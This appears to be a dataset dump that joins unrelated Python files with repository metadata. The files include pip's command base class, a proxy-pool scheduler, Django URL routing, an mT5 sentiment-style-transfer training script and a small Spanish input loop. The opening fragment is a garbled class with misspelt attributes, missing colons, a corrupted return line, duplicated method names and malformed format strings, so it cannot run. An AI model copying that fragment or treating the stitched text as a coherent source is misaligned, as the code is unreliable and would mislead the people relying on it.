def earn(self,money):
self.money=moeny
def money(self):
return self.moeny
def __str6__(self):
return "%s is a %s" % (self.moeney)
def care(self,care)
self.care=care
def care(self):
return self.care
def __str5__(self):
return "%s is a %s" % (self.care)
def request(self,request)
self.request=request
def request(self):
return self.request
def __str4__(self):
return "%s is a %s" % (self.request)
def request(self,choosing)
self.choosing=choosing
def request(self):
return self.choosing
def __str3__(self):
return "%s is a %s" % (self.choosing)
def request(self,max):
self.max=max
def request(self):
return self.max
def __str2__(self):
return "%s is a %s" % (self.max)
class review ():
rate=int(input())
review=string(input())
def rate(self,rate):
self.rate=rate
def rate(self):
return self.rate
def __str1_(self):
returq"n "%s is a %s" % (self.rate)
def review(self,review):
self.review=review
def review(self):
return self.review
def __str10__(self):
return "%s is a %s" % (self.review)
class info:
combi=input(string())
def combi(self,combi):
self.combi=combi
def request(self):
return self.combi
def __str14__(self):
return "%s is a %s" % (self.max)
|
[
"noreply@github.com"
] |
MohanSharmav.noreply@github.com
|
93a2fb3e1ff02e04dc8e1206b435a3c6a66fb056
|
03f40e1e96f78240904ee90ae3257611e0d2b981
|
/venv/lib/python3.8/site-packages/pip-19.0.3-py3.8.egg/pip/_internal/cli/base_command.py
|
1b91389b9892aac2e52a005332052a4381b00593
|
[] |
no_license
|
otr0624/StoreApp
|
bd584a37af668a4055969cdf03fa2e688f51e395
|
76ae4040ccfe1f415c8c2acf88550690cb537290
|
refs/heads/master
| 2022-04-22T19:35:03.231742
| 2020-04-14T23:43:19
| 2020-04-14T23:43:19
| 255,651,497
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,501
|
py
|
"""Base Command class, and related routines"""
from __future__ import absolute_import, print_function
import logging
import logging.config
import optparse
import os
import platform
import sys
import traceback
from pip._internal.cli import cmdoptions
from pip._internal.cli.parser import (
ConfigOptionParser,
UpdatingDefaultsHelpFormatter,
)
from pip._internal.cli.status_codes import (
ERROR,
PREVIOUS_BUILD_DIR_ERROR,
SUCCESS,
UNKNOWN_ERROR,
VIRTUALENV_NOT_FOUND,
)
from pip._internal.download import PipSession
from pip._internal.exceptions import (
BadCommand,
CommandError,
InstallationError,
PreviousBuildDirError,
UninstallationError,
)
from pip._internal.index import PackageFinder
from pip._internal.locations import running_under_virtualenv
from pip._internal.req.constructors import (
install_req_from_editable,
install_req_from_line,
)
from pip._internal.req.req_file import parse_requirements
from pip._internal.utils.deprecation import deprecated
from pip._internal.utils.logging import BrokenStdoutLoggingError, setup_logging
from pip._internal.utils.misc import (
get_prog,
normalize_path,
redact_password_from_url,
)
from pip._internal.utils.outdated import pip_version_check
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import Optional, List, Tuple, Any # noqa: F401
from optparse import Values # noqa: F401
from pip._internal.cache import WheelCache # noqa: F401
from pip._internal.req.req_set import RequirementSet # noqa: F401
__all__ = ["Command"]
logger = logging.getLogger(__name__)
class Command(object):
    """Base class for all pip commands.

    Builds the option parser, creates network sessions on demand, and
    drives the subclass's run() inside main() with top-level error
    handling, exit-code mapping, and an optional pip version check.
    """

    name = None  # type: Optional[str]
    usage = None  # type: Optional[str]
    hidden = False  # type: bool
    ignore_require_venv = False  # type: bool

    def __init__(self, isolated=False):
        # type: (bool) -> None
        # The parser prog is e.g. "pip install"; description comes from
        # the subclass docstring.
        parser_kw = {
            "usage": self.usage,
            "prog": "%s %s" % (get_prog(), self.name),
            "formatter": UpdatingDefaultsHelpFormatter(),
            "add_help_option": False,
            "name": self.name,
            "description": self.__doc__,
            "isolated": isolated,
        }

        self.parser = ConfigOptionParser(**parser_kw)

        # Commands should add options to this option group
        optgroup_name = "%s Options" % self.name.capitalize()
        self.cmd_opts = optparse.OptionGroup(self.parser, optgroup_name)

        # Add the general options
        gen_opts = cmdoptions.make_option_group(cmdoptions.general_group, self.parser,)
        self.parser.add_option_group(gen_opts)

    def run(self, options, args):
        # type: (Values, List[Any]) -> Any
        """Subclasses implement the actual command behaviour here."""
        raise NotImplementedError

    def _build_session(self, options, retries=None, timeout=None):
        # type: (Values, Optional[int], Optional[int]) -> PipSession
        """Create a PipSession configured from command-line options
        (cache dir, retries, certs, timeouts, proxies, prompting)."""
        session = PipSession(
            cache=(
                normalize_path(os.path.join(options.cache_dir, "http"))
                if options.cache_dir
                else None
            ),
            retries=retries if retries is not None else options.retries,
            insecure_hosts=options.trusted_hosts,
        )

        # Handle custom ca-bundles from the user
        if options.cert:
            session.verify = options.cert

        # Handle SSL client certificate
        if options.client_cert:
            session.cert = options.client_cert

        # Handle timeouts
        if options.timeout or timeout:
            session.timeout = timeout if timeout is not None else options.timeout

        # Handle configured proxies
        if options.proxy:
            session.proxies = {
                "http": options.proxy,
                "https": options.proxy,
            }

        # Determine if we can prompt the user for authentication or not
        session.auth.prompting = not options.no_input

        return session

    def parse_args(self, args):
        # type: (List[str]) -> Tuple
        # factored out for testability
        return self.parser.parse_args(args)

    def main(self, args):
        # type: (List[str]) -> int
        """Parse args, run the command, and translate exceptions into
        the status codes from pip._internal.cli.status_codes."""
        options, args = self.parse_args(args)

        # Set verbosity so that it can be used elsewhere.
        self.verbosity = options.verbose - options.quiet

        level_number = setup_logging(
            verbosity=self.verbosity,
            no_color=options.no_color,
            user_log_file=options.log,
        )

        # Deprecation warnings for soon-unsupported interpreters.
        if sys.version_info[:2] == (3, 4):
            deprecated(
                "Python 3.4 support has been deprecated. pip 19.1 will be the "
                "last one supporting it. Please upgrade your Python as Python "
                "3.4 won't be maintained after March 2019 (cf PEP 429).",
                replacement=None,
                gone_in="19.2",
            )
        elif sys.version_info[:2] == (2, 7):
            message = "A future version of pip will drop support for Python 2.7."
            if platform.python_implementation() == "CPython":
                message = (
                    "Python 2.7 will reach the end of its life on January "
                    "1st, 2020. Please upgrade your Python as Python 2.7 "
                    "won't be maintained after that date. "
                ) + message
            deprecated(message, replacement=None, gone_in=None)

        # TODO: Try to get these passing down from the command?
        # without resorting to os.environ to hold these.
        # This also affects isolated builds and it should.

        if options.no_input:
            os.environ["PIP_NO_INPUT"] = "1"

        if options.exists_action:
            os.environ["PIP_EXISTS_ACTION"] = " ".join(options.exists_action)

        if options.require_venv and not self.ignore_require_venv:
            # If a venv is required check if it can really be found
            if not running_under_virtualenv():
                logger.critical("Could not find an activated virtualenv (required).")
                sys.exit(VIRTUALENV_NOT_FOUND)

        try:
            status = self.run(options, args)
            # FIXME: all commands should return an exit status
            # and when it is done, isinstance is not needed anymore
            if isinstance(status, int):
                return status
        except PreviousBuildDirError as exc:
            logger.critical(str(exc))
            logger.debug("Exception information:", exc_info=True)

            return PREVIOUS_BUILD_DIR_ERROR
        except (InstallationError, UninstallationError, BadCommand) as exc:
            logger.critical(str(exc))
            logger.debug("Exception information:", exc_info=True)

            return ERROR
        except CommandError as exc:
            logger.critical("ERROR: %s", exc)
            logger.debug("Exception information:", exc_info=True)

            return ERROR
        except BrokenStdoutLoggingError:
            # Bypass our logger and write any remaining messages to stderr
            # because stdout no longer works.
            print("ERROR: Pipe to stdout was broken", file=sys.stderr)
            if level_number <= logging.DEBUG:
                traceback.print_exc(file=sys.stderr)

            return ERROR
        except KeyboardInterrupt:
            logger.critical("Operation cancelled by user")
            logger.debug("Exception information:", exc_info=True)

            return ERROR
        except BaseException:
            logger.critical("Exception:", exc_info=True)

            return UNKNOWN_ERROR
        finally:
            allow_version_check = (
                # Does this command have the index_group options?
                hasattr(options, "no_index")
                and
                # Is this command allowed to perform this check?
                not (options.disable_pip_version_check or options.no_index)
            )

            # Check if we're using the latest version of pip available
            if allow_version_check:
                session = self._build_session(
                    options, retries=0, timeout=min(5, options.timeout)
                )
                with session:
                    pip_version_check(session, options)

            # Shutdown the logging module
            logging.shutdown()

        # Reached when run() returned a non-int (or None).
        return SUCCESS
class RequirementCommand(Command):
    """Base for commands that take requirement specifiers on the command
    line (e.g. install/download/wheel): adds helpers to collect
    requirements and to build a configured PackageFinder."""

    @staticmethod
    def populate_requirement_set(
        requirement_set,  # type: RequirementSet
        args,  # type: List[str]
        options,  # type: Values
        finder,  # type: PackageFinder
        session,  # type: PipSession
        name,  # type: str
        wheel_cache,  # type: Optional[WheelCache]
    ):
        # type: (...) -> None
        """
        Marshal cmd line args into a requirement set.
        """
        # NOTE: As a side-effect, options.require_hashes and
        # requirement_set.require_hashes may be updated

        # Constraints files first: they limit versions without requiring
        # the named projects to be installed.
        for filename in options.constraints:
            for req_to_add in parse_requirements(
                filename,
                constraint=True,
                finder=finder,
                options=options,
                session=session,
                wheel_cache=wheel_cache,
            ):
                req_to_add.is_direct = True
                requirement_set.add_requirement(req_to_add)

        # Plain "pip install <spec>" positional arguments.
        for req in args:
            req_to_add = install_req_from_line(
                req,
                None,
                isolated=options.isolated_mode,
                use_pep517=options.use_pep517,
                wheel_cache=wheel_cache,
            )
            req_to_add.is_direct = True
            requirement_set.add_requirement(req_to_add)

        # -e/--editable requirements.
        for req in options.editables:
            req_to_add = install_req_from_editable(
                req,
                isolated=options.isolated_mode,
                use_pep517=options.use_pep517,
                wheel_cache=wheel_cache,
            )
            req_to_add.is_direct = True
            requirement_set.add_requirement(req_to_add)

        # -r/--requirement files.
        for filename in options.requirements:
            for req_to_add in parse_requirements(
                filename,
                finder=finder,
                options=options,
                session=session,
                wheel_cache=wheel_cache,
                use_pep517=options.use_pep517,
            ):
                req_to_add.is_direct = True
                requirement_set.add_requirement(req_to_add)

        # If --require-hashes was a line in a requirements file, tell
        # RequirementSet about it:
        requirement_set.require_hashes = options.require_hashes

        # Nothing to do at all is a usage error; suggest --find-links
        # confusion when it applies.
        if not (args or options.editables or options.requirements):
            opts = {"name": name}
            if options.find_links:
                raise CommandError(
                    "You must give at least one requirement to %(name)s "
                    '(maybe you meant "pip %(name)s %(links)s"?)'
                    % dict(opts, links=" ".join(options.find_links))
                )
            else:
                raise CommandError(
                    "You must give at least one requirement to %(name)s "
                    '(see "pip help %(name)s")' % opts
                )

    def _build_package_finder(
        self,
        options,  # type: Values
        session,  # type: PipSession
        platform=None,  # type: Optional[str]
        python_versions=None,  # type: Optional[List[str]]
        abi=None,  # type: Optional[str]
        implementation=None,  # type: Optional[str]
    ):
        # type: (...) -> PackageFinder
        """
        Create a package finder appropriate to this requirement command.
        """
        index_urls = [options.index_url] + options.extra_index_urls
        if options.no_index:
            # Log the ignored indexes with credentials scrubbed.
            logger.debug(
                "Ignoring indexes: %s",
                ",".join(redact_password_from_url(url) for url in index_urls),
            )
            index_urls = []

        return PackageFinder(
            find_links=options.find_links,
            format_control=options.format_control,
            index_urls=index_urls,
            trusted_hosts=options.trusted_hosts,
            allow_all_prereleases=options.pre,
            session=session,
            platform=platform,
            versions=python_versions,
            abi=abi,
            implementation=implementation,
            prefer_binary=options.prefer_binary,
        )
|
[
"otr0624@mail.com"
] |
otr0624@mail.com
|
a6c842eed1101af2549ccae3147b4114cab2c774
|
be00087163598b7876c88327f6b01a8082aaa29d
|
/proxypool/scheduler.py
|
c59e6aef975602799faf7770f47031a478f59de5
|
[
"Apache-2.0"
] |
permissive
|
saury2013/ProxyPoolManager
|
67b61a24c22a00b3606f080f4f3e385074e54b0c
|
8ad9b6b35b03e02bc748e11db262c9ea94a65fbe
|
refs/heads/master
| 2022-12-16T06:59:14.875425
| 2018-04-27T15:53:03
| 2018-04-27T15:53:03
| 131,309,102
| 1
| 0
|
Apache-2.0
| 2022-12-08T02:11:04
| 2018-04-27T14:45:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,229
|
py
|
# -*- coding: utf-8 -*-
__author__ = 'Allen'
import time
from multiprocessing import Process
from proxypool.server import app
from proxypool.importer import Importer
from proxypool.tester import Tester
from proxypool.conf import *
class Scheduler():
    """Launches the proxy-pool components (tester, importer, API server)
    as independent child processes."""

    def schedule_tester(self, cycle=TESTER_CYCLE):
        """Validate pooled proxies forever, sleeping *cycle* seconds
        between rounds."""
        checker = Tester()
        while True:
            print('run test...')
            checker.run()
            time.sleep(cycle)

    def schedule_importer(self, cycle=GETTER_CYCLE):
        """Pull fresh proxies from the net forever, every *cycle* seconds."""
        fetcher = Importer()
        while True:
            print('importer run...')
            fetcher.import_from_net()
            time.sleep(cycle)

    def schedule_server(self):
        """Serve the HTTP API (blocking call)."""
        print('server run in ', SERVER_HOST, ':', SERVER_PORT)
        app.run(SERVER_HOST, SERVER_PORT)

    def run(self):
        """Start one child process per component enabled in the config."""
        print('ProxyManager running...')
        components = [
            (TESTER_ENABLED, self.schedule_tester),
            (IMPORTER_ENABLED, self.schedule_importer),
            (SERVER_ENABLED, self.schedule_server),
        ]
        for enabled, target in components:
            if enabled:
                Process(target=target).start()
|
[
"saury2011@sina.com"
] |
saury2011@sina.com
|
ffc341374c3963e03ae196c04ffb63f090bf256d
|
fb05e7987622c8e9e49abaaef8b7681d07fe2013
|
/PCCFP/urls.py
|
78092f4f250c2f72135e1040ccb49c23f4d2137a
|
[] |
no_license
|
Wayne122/PCCFP
|
d012aaa62bb515fcc28d11f557a9ee1c2f2103f7
|
7babde9bd971b4d60b8bbc9096cbd65473715be2
|
refs/heads/master
| 2021-09-02T11:15:02.804602
| 2018-01-02T07:44:30
| 2018-01-02T07:44:30
| 115,988,388
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,777
|
py
|
"""PCCFP URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url, include
from django.contrib.auth import views as auth_views
from article.views import home, account, article, create, author_works, follow, unfollow, follow_list, comment, edit
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', home, name='home'),
url(r'^login/$', auth_views.login, name='login'),
url(r'^logout/$', auth_views.logout, {'next_page': 'home'}, name='logout'),
url(r'^oauth/', include('social_django.urls', namespace='social')),
url(r'^account_detail/', account, name='account_detail'),
url(r'^article/(?P<pk>\d+)/$', article, name='article_detail'),
url(r'^create/$', create, name='create_article'),
url(r'^author/(?P<pk>\d+)/$', author_works, name='author'),
url(r'^follow/(?P<pk>\d+)/$', follow, name='follow'),
url(r'^unfollow/(?P<pk>\d+)/$', unfollow, name='unfollow'),
url(r'^follow_list/$', follow_list, name='follow_list'),
url(r'^article/(?P<pk>\d+)/comment/$', comment, name='comment'),
url(r'^article/(?P<pk>\d+)/edit/$', edit, name='edit_article'),
]
|
[
"noreply@github.com"
] |
Wayne122.noreply@github.com
|
677ab1c8a55d31eb4cb350562b92d815d5ce7264
|
b155e9d8951f7b3437b21994dfa81eac740ab940
|
/appPy/generation_module.py
|
f1ae6e89debd9f6dd55c42720dd56a11b46b9109
|
[] |
no_license
|
pichayak/sentiment-style-transfer
|
610d8e31e27ae9c92a17a5f3d8353ee3ea8de577
|
4a4f89a41913c5e2e5975efe2b0f174cc21c5806
|
refs/heads/main
| 2023-04-29T21:46:26.041077
| 2021-05-25T15:34:26
| 2021-05-25T15:34:26
| 362,867,529
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,599
|
py
|
# -*- coding: utf-8 -*-
# !pip install -q transformers==4.1.1 sentencepiece
# !pip install -q pytorch-lightning
import argparse
import csv
import os
import shutil
import ast
import pandas as pd
import re
import numpy as np
import torch
from torch.utils.data import Dataset, DataLoader
from pytorch_lightning import LightningModule, Trainer, seed_everything
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from transformers import (
T5Tokenizer,
MT5ForConditionalGeneration,
AdamW,
get_linear_schedule_with_warmup
)
from transformers.models.bart.modeling_bart import shift_tokens_right
def preprocess(x):
    """Fill the '<mask>' slots in x['target'] left-to-right with the
    space-separated attribute words from x['pos_attr'].

    Mutates *x* in place (pandas row / mapping) and returns it.
    """
    filled = x['target']
    for word in x['pos_attr'].split(' '):
        filled = filled.replace('<mask>', word, 1)
    x['target'] = filled
    return x
class DialogueDataset(Dataset):
    """Tokenized seq2seq pairs built from the TF-IDF retrieval output.

    source: '<ATTRS> <pos words> <CONT_START> <masked neg content> <START>'
    target: the negative content with each '<mask>' filled by a positive word.
    """

    def __init__(self, data_dir, split, tokenizer, max_length):
        # Preprocessing
        # NOTE(review): data_dir and split are currently ignored — the CSV
        # path is hard-coded to a Colab Drive mount; confirm before reuse.
        data = pd.read_csv('/content/drive/Shareddrives/Pretend To Understand NLP/retrieve_output_tfidf.csv')
        # "['a', 'b']" list-literal string -> "a b" (space-separated words)
        data['pos_attr'] = data['pos_attr'].apply(lambda x: x[2:-2].replace("', '",' '))
        data['target'] = data['neg_content']
        # The source keeps the content with the masks stripped out.
        data['neg_content'] = data['neg_content'].apply(lambda x: x.replace('<mask>',''))
        data['source'] = '<ATTRS> ' + data['pos_attr'] + ' <CONT_START> ' + data['neg_content'] + ' <START>'
        # preprocess() fills the masks in 'target' with the attribute words.
        data = data.apply(preprocess, axis=1)
        data = data.drop(['neg_sentence','neg_content','pos_attr'], axis=1)
        model_input = data['source']
        src_texts = model_input.to_list()
        tgt_texts = data['target'].to_list()
        # Tokenize everything up front; __getitem__ only slices tensors.
        self.batch = tokenizer.prepare_seq2seq_batch(
            src_texts=src_texts,
            tgt_texts=tgt_texts,
            max_length=max_length,
            return_tensors='pt'
        )

    def __len__(self):
        # One example per row of the tokenized batch.
        return self.batch['input_ids'].size(0)

    def __getitem__(self, index):
        input_ids = self.batch['input_ids'][index]
        attention_mask = self.batch['attention_mask'][index]
        labels = self.batch['labels'][index]
        return {
            'input_ids': input_ids,
            'attention_mask': attention_mask,
            'labels': labels
        }
def label_smoothed_nll_loss(lprobs, target, epsilon, ignore_index=-100):
'''From fairseq'''
if target.dim() == lprobs.dim() - 1:
target = target.unsqueeze(-1)
nll_loss = -lprobs.gather(dim=-1, index=target)
smooth_loss = -lprobs.sum(dim=-1, keepdim=True)
if ignore_index is not None:
pad_mask = target.eq(ignore_index)
nll_loss.masked_fill_(pad_mask, 0.0)
smooth_loss.masked_fill_(pad_mask, 0.0)
else:
nll_loss = nll_loss.squeeze(-1)
smooth_loss = smooth_loss.squeeze(-1)
nll_loss = nll_loss.sum()
smooth_loss = smooth_loss.sum()
eps_i = epsilon / lprobs.size(-1)
loss = (1.0 - epsilon) * nll_loss + eps_i * smooth_loss
return loss, nll_loss
class MT5Trainer(LightningModule):
    """LightningModule fine-tuning google/mt5-small for sentiment style
    transfer with label-smoothed cross entropy."""

    def __init__(self, params):
        super().__init__()
        self.save_hyperparameters(params)
        self.tokenizer = T5Tokenizer.from_pretrained('google/mt5-small')
        self.model = MT5ForConditionalGeneration.from_pretrained('google/mt5-small')
        # Special tokens
        # NOTE(review): tokens are added to the tokenizer but the model's
        # embedding matrix is not resized here — confirm this is intended.
        special_tokens_dict = {'additional_special_tokens': ['<ATTRS>','<CONT_START>','<START>']}
        num_added_tokens = self.tokenizer.add_special_tokens(special_tokens_dict)
        # loader
        # Built eagerly so configure_optimizers can compute step counts.
        dataset = DialogueDataset(
            data_dir=self.hparams.data_dir,
            split='train',
            tokenizer=self.tokenizer,
            max_length=self.hparams.max_length
        )
        self.train_loader = DataLoader(
            dataset=dataset,
            batch_size=self.hparams.train_batch_size,
            shuffle=True
        )

    def forward(self, input_ids, attention_mask, decoder_input_ids):
        # Raw model forward pass; loss is computed in the *_step hooks.
        return self.model(
            input_ids=input_ids,
            attention_mask=attention_mask,
            decoder_input_ids=decoder_input_ids
        )

    def training_step(self, batch, batch_idx):
        pad_token_id = self.tokenizer.pad_token_id
        input_ids = batch['input_ids']
        attention_mask = batch['attention_mask']
        labels = batch['labels']
        # Teacher forcing: decoder inputs are the labels shifted right.
        decoder_input_ids = shift_tokens_right(labels, pad_token_id)
        outputs = self(
            input_ids=input_ids,
            attention_mask=attention_mask,
            decoder_input_ids=decoder_input_ids
        )
        logits = outputs[0]
        lprobs = torch.nn.functional.log_softmax(logits, dim=-1)
        loss, nll_loss = label_smoothed_nll_loss(
            lprobs=lprobs,
            target=labels,
            epsilon=self.hparams.label_smoothing,
            ignore_index=pad_token_id
        )
        self.log('train_loss', loss, on_epoch=True, prog_bar=True)
        return loss

    def validation_step(self, batch, batch_idx):
        # Same computation as training_step, logged as val_loss.
        pad_token_id = self.tokenizer.pad_token_id
        input_ids = batch['input_ids']
        attention_mask = batch['attention_mask']
        labels = batch['labels']
        decoder_input_ids = shift_tokens_right(labels, pad_token_id)
        outputs = self(
            input_ids=input_ids,
            attention_mask=attention_mask,
            decoder_input_ids=decoder_input_ids
        )
        logits = outputs[0]
        lprobs = torch.nn.functional.log_softmax(logits, dim=-1)
        loss, nll_loss = label_smoothed_nll_loss(
            lprobs=lprobs,
            target=labels,
            epsilon=self.hparams.label_smoothing,
            ignore_index=pad_token_id
        )
        self.log('val_loss', loss, prog_bar=True)

    def test_step(self, batch, batch_idx):
        input_ids = batch['input_ids']
        attention_mask = batch['attention_mask']
        # https://huggingface.co/blog/how-to-generate
        beam_outputs = self.model.generate(
            input_ids=input_ids,
            attention_mask=attention_mask,
            max_length=50,
            num_beams=5,
            no_repeat_ngram_size=2,
            early_stopping=True
        )
        preds = [
            self.tokenizer.decode(beam_output, skip_special_tokens=True)
            for beam_output in beam_outputs
        ]
        return preds

    def test_epoch_end(self, outputs):
        # Dump all beam-search predictions, one per line.
        with open(os.path.join(self.hparams.output_dir, 'preds.txt'), 'w') as f:
            for output in outputs:
                f.write('\n'.join(output) + '\n')

    def configure_optimizers(self):
        # optimizer
        # Standard transformer recipe: no weight decay on biases/LayerNorm.
        no_decay = ['bias', 'LayerNorm.weight']
        optimizer_grouped_parameters = [
            {
                'params': [
                    p for n, p in self.model.named_parameters()
                    if not any(nd in n for nd in no_decay)
                ],
                'weight_decay': self.hparams.weight_decay
            },
            {
                'params': [
                    p for n, p in self.model.named_parameters()
                    if any(nd in n for nd in no_decay)
                ],
                'weight_decay': 0.0
            },
        ]
        # "(0.9,0.999)" string -> (0.9, 0.999)
        betas = tuple(map(float, self.hparams.adam_betas[1:-1].split(',')))
        optimizer = AdamW(
            optimizer_grouped_parameters,
            betas=betas,
            eps=self.hparams.adam_eps,
            lr=self.hparams.lr
        )
        # scheduler
        # Optimizer steps per run = batches / accumulation * epochs.
        num_training_steps = (
            len(self.train_loader)
            // self.hparams.accumulate_grad_batches
            * self.hparams.max_epochs
        )
        lr_scheduler = get_linear_schedule_with_warmup(
            optimizer,
            num_warmup_steps=self.hparams.num_warmup_steps,
            num_training_steps=num_training_steps
        )
        lr_dict = {'scheduler': lr_scheduler, 'interval': 'step'}
        return [optimizer], [lr_dict]

    def train_dataloader(self):
        return self.train_loader

    def val_dataloader(self):
        # NOTE(review): split='val' is passed but DialogueDataset ignores
        # it, so train and val read the same CSV — verify.
        dataset = DialogueDataset(
            data_dir=self.hparams.data_dir,
            split='val',
            tokenizer=self.tokenizer,
            max_length=self.hparams.max_length
        )
        loader = DataLoader(
            dataset=dataset,
            batch_size=self.hparams.val_batch_size
        )
        return loader

    def test_dataloader(self):
        dataset = DialogueDataset(
            data_dir=self.hparams.data_dir,
            split='test',
            tokenizer=self.tokenizer,
            max_length=self.hparams.max_length
        )
        loader = DataLoader(
            dataset=dataset,
            batch_size=self.hparams.val_batch_size
        )
        return loader
# Hyper-parameters and run configuration for this training session.
args = argparse.Namespace(
    data_dir='dataset',
    output_dir="weights",
    seed=42,
    label_smoothing=0.1,
    weight_decay=0.1,
    lr=1e-4,
    adam_betas='(0.9,0.999)',
    adam_eps=1e-6,
    num_warmup_steps=500,
    train_batch_size=4,
    val_batch_size=4,
    max_length=128,
    accumulate_grad_batches=16,  # effective batch size = 4 * 16 = 64
    gpus=1,
    gradient_clip_val=0.1,
    max_epochs=40
)

# Start from a clean checkpoint directory.
if os.path.isdir(args.output_dir):
    shutil.rmtree(args.output_dir)
os.mkdir(args.output_dir)

# Keep the checkpoint with the lowest validation loss.
checkpoint_callback = ModelCheckpoint(
    dirpath=args.output_dir,
    monitor='val_loss',
    mode='min',
)

trainer = Trainer(
    callbacks=[checkpoint_callback],
    gradient_clip_val=args.gradient_clip_val,
    gpus=args.gpus,
    accumulate_grad_batches=args.accumulate_grad_batches,
    max_epochs=args.max_epochs,
)
def load_model():
    """Return an MT5Trainer restored from the shared-Drive checkpoint.

    NOTE(review): load_from_checkpoint is a classmethod, so the freshly
    constructed MT5Trainer(args) is discarded and a new instance built
    from the checkpoint's own hparams is returned — confirm intended.
    """
    model = MT5Trainer(args)
    model = model.load_from_checkpoint('/content/drive/Shareddrives/Pretend To Understand NLP/weights.ckpt')
    return model
def pr(text):
    """Print *text*; thin convenience wrapper around print()."""
    print(text)
def predict(model, attrs, context):
    """Generate five beam-search candidates for the given attribute
    words and masked context, with special tokens stripped.

    model: loaded MT5Trainer; attrs: list of attribute words;
    context: content string whose '<mask>' markers are removed.
    Returns a list of five cleaned strings.
    """
    prompt = "<ATTRS> {} <CONT_START> {} <START>".format(
        " ".join(attrs), context.replace("<mask>", "")
    )
    input_ids = model.tokenizer.encode(prompt, return_tensors='pt')
    beams = model.model.generate(
        input_ids,
        max_length=50,
        num_beams=10,
        early_stopping=True,
        num_return_sequences=5,
    )
    results = []
    for seq in beams:
        decoded = model.tokenizer.decode(seq)
        # Drop everything after the end-of-sequence marker, then strip
        # the remaining special / sentinel tokens.
        decoded = re.sub(r"</s>.*", "", decoded)
        decoded = re.sub(r"(<pad>|<mask>|<extra_id_[0-9]*>)\s?", "", decoded)
        results.append(decoded.strip())
    return results
# model = load_model()
# predict(model, ['อยาก'], '<mask>กินข้าวร้านนั้นเลยอ่ะ ไม่อร่อย รสชาติมาก')
|
[
"i.love.u.baby2353@gmail.com"
] |
i.love.u.baby2353@gmail.com
|
f9f228e3279fac5da75e69c3e095ec6c6b668324
|
83c26e4b6e4a3b028cf0c44ad03da72ce8e23fef
|
/mblog/urls.py
|
4f43436905ebb5411c919fe1e43dc6dc7567c003
|
[
"Apache-2.0"
] |
permissive
|
sharpcj/MyDjangoBlog
|
d5d98962a1c8a874ef13fdac27874c2e855b237e
|
07b434b73dbadc02b751e2a847cf083da8634190
|
refs/heads/master
| 2021-01-23T10:08:35.190672
| 2017-09-08T15:02:53
| 2017-09-08T15:02:53
| 102,609,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 869
|
py
|
"""mblog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from mainsite.views import homepage, showpost
urlpatterns = [
url(r'^$', homepage),
url(r'^admin/', admin.site.urls),
url(r'^post/(\w+)$',showpost)
]
|
[
"li_joy99@163.com"
] |
li_joy99@163.com
|
821d4ee6e80527f333708910e8298d43b33f94c0
|
1bfe5e92f10d1c6b8fe8f7d4064fcd9b0613fbee
|
/23-03-2017/ejercicio-bucle-informes.py
|
4968bb84b90f336c467ad61196cfafefa5cc4868
|
[] |
no_license
|
ism46999937/M03
|
1c3b7e0aedd9202ef7c1d4c335bbaa1da8e1016b
|
1c0fbd4588e8e90d7f9d12b9fed666f55b549b20
|
refs/heads/master
| 2020-02-26T15:09:32.915113
| 2019-10-29T10:56:07
| 2019-10-29T10:56:07
| 83,586,984
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 357
|
py
|
#!/usr/bin/python3
# coding: utf-8
"""Prompt repeatedly for a year and report whether a yearly report exists.

Years up to 2016 have a report; entering a year after 2016 prints a
notice and ends the program.

Fixes over the original: Python 2 `print` statements converted to
Python 3; the redundant nested `if anyo > 2016` inside the `else` of
`anyo <= 2016` removed (the else branch already implies it); the dead
`anyo = anyo + 1` (always overwritten by the next input) dropped.
"""
import os
import time


def informe(anyo):
    """Return the report line for *anyo* (reports exist for years <= 2016)."""
    if anyo <= 2016:
        return "Informe %d" % anyo
    return "No hay informe para el año especificado"


def main():
    """Clear the screen, then prompt until a year beyond 2016 is entered."""
    os.system('clear')
    time.sleep(2)
    salir = False
    while not salir:
        print("")
        # int(...) replaces Python 2's eval-based input()
        anyo = int(input("Teclee un año 2010 o 2016: "))
        print(informe(anyo))
        if anyo > 2016:
            salir = True


if __name__ == "__main__":
    main()
|
[
"noreply@github.com"
] |
ism46999937.noreply@github.com
|
13318bf1791f00566d303db1a171be23285f26bc
|
43c203bc5cc09eda3f418a64777b091b55383e36
|
/test/log_test.py
|
603ff6c1a6700ab7f8f043b15c61e6c8702354f0
|
[
"Apache-2.0"
] |
permissive
|
mpaladin/python-mtb
|
fc615a8b6f35d4f21866e28f725a8ec4c0f6f33d
|
840f1a37da05efbbb9f6a46e3c9eba43bfe5c3fb
|
refs/heads/master
| 2020-04-26T11:42:22.266378
| 2013-04-25T07:26:42
| 2013-04-25T07:26:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,533
|
py
|
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
